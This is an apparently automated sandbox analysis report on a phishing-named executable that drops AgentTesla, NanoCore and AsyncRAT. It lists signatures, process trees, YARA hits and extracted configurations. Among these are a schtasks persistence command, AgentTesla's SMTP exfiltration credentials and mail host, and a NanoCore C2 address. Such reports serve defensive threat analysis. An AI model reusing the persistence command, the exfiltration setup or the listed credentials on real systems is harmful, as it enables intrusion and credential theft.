Play interactive tour

Edit tour

Analysis Report Consignment Document PL&BL Draft.exe

Overview

General Information

Sample Name:	Consignment Document PL&BL Draft.exe
Analysis ID:	326301
MD5:	b70ffeb2babbacb28b22411beccb4642
SHA1:	3c096e92894c9ff7bfae0fcc0ce5f250cb4ebe9f
SHA256:	623d707cab5c5dc378a5100018e29f88949f4ea4be4b34cc2fc36e1612b68100
Tags:	AgentTeslaexeTNT
Most interesting Screenshot:

Detection

Nanocore AgentTesla AsyncRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Nanocore Rat

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

Yara detected AsyncRAT

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to detect virtual machines (SLDT)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

Consignment Document PL&BL Draft.exe (PID: 6620 cmdline: 'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe' MD5: B70FFEB2BABBACB28B22411BECCB4642)

Consignment Document PL&BL Draft.exe (PID: 6796 cmdline: {path} MD5: B70FFEB2BABBACB28B22411BECCB4642)

Rczgwoxvqzh.exe (PID: 6872 cmdline: 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe' MD5: 01475371C9519A0C8F64B7606A0833E0)

Isgeprf.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe' MD5: E2DA4F42475E01F7961EF2FB929DE54E)

cmd.exe (PID: 4420 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6340 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat'' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 2168 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

VLC2.exe (PID: 6228 cmdline: 'C:\Users\user\AppData\Local\Temp\VLC2.exe' MD5: E2DA4F42475E01F7961EF2FB929DE54E)

Fdquqwatjjr.exe (PID: 7032 cmdline: 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe' MD5: E8DC83A4ED7657D3211077B7F343FC3C)

Icda.exe (PID: 6888 cmdline: 'C:\Users\user\AppData\Local\Temp\Icda.exe' MD5: BB21F995740D8BC1549D9CBC32874DD8)

VLC2.exe (PID: 6008 cmdline: C:\Users\user\AppData\Local\Temp\VLC2.exe MD5: E2DA4F42475E01F7961EF2FB929DE54E)

dhcpmon.exe (PID: 6608 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: BB21F995740D8BC1549D9CBC32874DD8)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "gfumyAo", "URL: ": "https://dh2LZPEqfQO.net", "To: ": "mebarth@flood-protection.org", "ByHost: ": "mail.flood-protection.org:587", "Password: ": "932mpxGhMO2", "From: ": "sent@flood-protection.org"}

Threatname: NanoCore

{"C2: ": ["172.94.25.202"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\VLC2.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\Icda.exe	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Local\Temp\Icda.exe	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
C:\Users\user\AppData\Local\Temp\Icda.exe	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Icda.exe	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
C:\Users\user\AppData\Local\Temp\Isgeprf.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x33ad:$a: NanoCore 0x3406:$a: NanoCore 0x3443:$a: NanoCore 0x34bc:$a: NanoCore 0x16b67:$a: NanoCore 0x16b7c:$a: NanoCore 0x16bb1:$a: NanoCore 0x2f64b:$a: NanoCore 0x2f660:$a: NanoCore 0x2f695:$a: NanoCore 0x340f:$b: ClientPlugin 0x344c:$b: ClientPlugin 0x3d4a:$b: ClientPlugin 0x3d57:$b: ClientPlugin 0x16923:$b: ClientPlugin 0x1693e:$b: ClientPlugin 0x1696e:$b: ClientPlugin 0x16b85:$b: ClientPlugin 0x16bba:$b: ClientPlugin 0x2f407:$b: ClientPlugin 0x2f422:$b: ClientPlugin
00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x23ba3:$a: NanoCore 0x23bfc:$a: NanoCore 0x23c39:$a: NanoCore 0x23cb2:$a: NanoCore 0x23c05:$b: ClientPlugin 0x23c42:$b: ClientPlugin 0x24540:$b: ClientPlugin 0x2454d:$b: ClientPlugin 0x1b3f1:$e: KeepAlive 0x2408d:$g: LogClientMessage 0x2400d:$i: get_Connected 0x15bd5:$j: #=q 0x15c05:$j: #=q 0x15c41:$j: #=q 0x15c69:$j: #=q 0x15c99:$j: #=q 0x15cc9:$j: #=q 0x15cf9:$j: #=q 0x15d29:$j: #=q 0x15d45:$j: #=q 0x15d75:$j: #=q
00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x493ad:$a: NanoCore 0x49406:$a: NanoCore 0x49443:$a: NanoCore 0x494bc:$a: NanoCore 0x5cb67:$a: NanoCore 0x5cb7c:$a: NanoCore 0x5cbb1:$a: NanoCore 0x7564b:$a: NanoCore 0x75660:$a: NanoCore 0x75695:$a: NanoCore 0x4940f:$b: ClientPlugin 0x4944c:$b: ClientPlugin 0x49d4a:$b: ClientPlugin 0x49d57:$b: ClientPlugin 0x5c923:$b: ClientPlugin 0x5c93e:$b: ClientPlugin 0x5c96e:$b: ClientPlugin 0x5cb85:$b: ClientPlugin 0x5cbba:$b: ClientPlugin 0x75407:$b: ClientPlugin 0x75422:$b: ClientPlugin
00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x7536d:$x1: NanoCore.ClientPluginHost 0x753aa:$x2: IClientNetworkHost 0x78edd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x750d5:$a: NanoCore 0x750e5:$a: NanoCore 0x75319:$a: NanoCore 0x7532d:$a: NanoCore 0x7536d:$a: NanoCore 0x75134:$b: ClientPlugin 0x75336:$b: ClientPlugin 0x75376:$b: ClientPlugin 0x7525b:$c: ProjectData 0x75c62:$d: DESCrypto 0x7d62e:$e: KeepAlive 0x7b61c:$g: LogClientMessage 0x77817:$i: get_Connected 0x75f98:$j: #=q 0x75fc8:$j: #=q 0x75fe4:$j: #=q 0x76014:$j: #=q 0x76030:$j: #=q 0x7604c:$j: #=q 0x7607c:$j: #=q 0x76098:$j: #=q
00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
Process Memory Space: Isgeprf.exe PID: 6976	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Rczgwoxvqzh.exe PID: 6872	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Rczgwoxvqzh.exe PID: 6872	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: VLC2.exe PID: 6228	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6608	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb7d6:$x1: NanoCore.ClientPluginHost 0x347f4:$x1: NanoCore.ClientPluginHost 0x3e8ab:$x1: NanoCore.ClientPluginHost 0x4446a:$x1: NanoCore.ClientPluginHost 0x552e8:$x1: NanoCore.ClientPluginHost 0xb837:$x2: IClientNetworkHost 0x3481a:$x2: IClientNetworkHost 0x3e8d1:$x2: IClientNetworkHost 0x444af:$x2: IClientNetworkHost 0x5532d:$x2: IClientNetworkHost 0x10c3c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1ebae:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6608	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6608	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xb2db:$a: NanoCore 0xb2f7:$a: NanoCore 0xb452:$a: NanoCore 0xb461:$a: NanoCore 0xb73a:$a: NanoCore 0xb766:$a: NanoCore 0xb7d6:$a: NanoCore 0x1b218:$a: NanoCore 0x1b22a:$a: NanoCore 0x1b266:$a: NanoCore 0x27121:$a: NanoCore 0x271a7:$a: NanoCore 0x272be:$a: NanoCore 0x346e6:$a: NanoCore 0x34787:$a: NanoCore 0x347f4:$a: NanoCore 0x348b5:$a: NanoCore 0x35786:$a: NanoCore 0x357d9:$a: NanoCore 0x35812:$a: NanoCore 0x35885:$a: NanoCore
Process Memory Space: Icda.exe PID: 6888	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xea40:$x1: NanoCore.ClientPluginHost 0x9bee5:$x1: NanoCore.ClientPluginHost 0xa1aa4:$x1: NanoCore.ClientPluginHost 0xb2922:$x1: NanoCore.ClientPluginHost 0x10a2dd:$x1: NanoCore.ClientPluginHost 0x1740ec:$x1: NanoCore.ClientPluginHost 0x184337:$x1: NanoCore.ClientPluginHost 0x302b99:$x1: NanoCore.ClientPluginHost 0xee58:$x2: IClientNetworkHost 0x9bf0b:$x2: IClientNetworkHost 0xa1ae9:$x2: IClientNetworkHost 0xb2967:$x2: IClientNetworkHost 0x10a303:$x2: IClientNetworkHost 0x174131:$x2: IClientNetworkHost 0x184398:$x2: IClientNetworkHost 0x302bbf:$x2: IClientNetworkHost 0x9ddb:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x18979d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x19770f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x30cc8c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x30dacf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: Icda.exe PID: 6888	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: Icda.exe PID: 6888	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xbb93:$a: NanoCore 0xd02f:$a: NanoCore 0xea40:$a: NanoCore 0xf12d:$a: NanoCore 0xf5c8:$a: NanoCore 0x9bdd7:$a: NanoCore 0x9be78:$a: NanoCore 0x9bee5:$a: NanoCore 0x9bfa6:$a: NanoCore 0x9ce77:$a: NanoCore 0x9ceca:$a: NanoCore 0x9cf03:$a: NanoCore 0x9cf76:$a: NanoCore 0xa1a1e:$a: NanoCore 0xa1a4b:$a: NanoCore 0xa1aa4:$a: NanoCore 0xa92b3:$a: NanoCore 0xa92c6:$a: NanoCore 0xa92f8:$a: NanoCore 0xb289c:$a: NanoCore 0xb28c9:$a: NanoCore
Process Memory Space: Fdquqwatjjr.exe PID: 7032	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Fdquqwatjjr.exe PID: 7032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Consignment Document PL&BL Draft.exe PID: 6620	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VLC2.exe PID: 6008	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 49 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Icda.exe.56d0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
3.2.Icda.exe.56d0000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
17.0.dhcpmon.exe.c80000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.0.dhcpmon.exe.c80000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
17.0.dhcpmon.exe.c80000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.0.dhcpmon.exe.c80000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.VLC2.exe.900000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Icda.exe.a40000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.Icda.exe.a40000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.Icda.exe.a40000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
